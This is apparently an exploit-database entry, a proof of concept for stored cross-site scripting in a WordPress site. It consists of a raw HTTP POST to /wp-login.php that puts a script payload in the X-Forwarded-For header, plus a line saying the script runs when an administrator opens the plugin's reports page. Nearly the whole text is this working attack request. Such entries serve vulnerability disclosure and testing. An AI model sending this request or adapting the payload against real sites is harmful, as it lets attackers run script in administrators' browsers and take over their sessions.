Share
## https://sploitus.com/exploit?id=WPEX-ID:C789CA04-D88C-4789-8BE1-812888F0C8F8
POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For:<script>alert(/XSS/)</script>

log=aa&pwd=dd&wp-submit=Log+In&testcookie=1


The XSS will be triggered when viewing the report page (/wp-admin/admin.php?page=reports)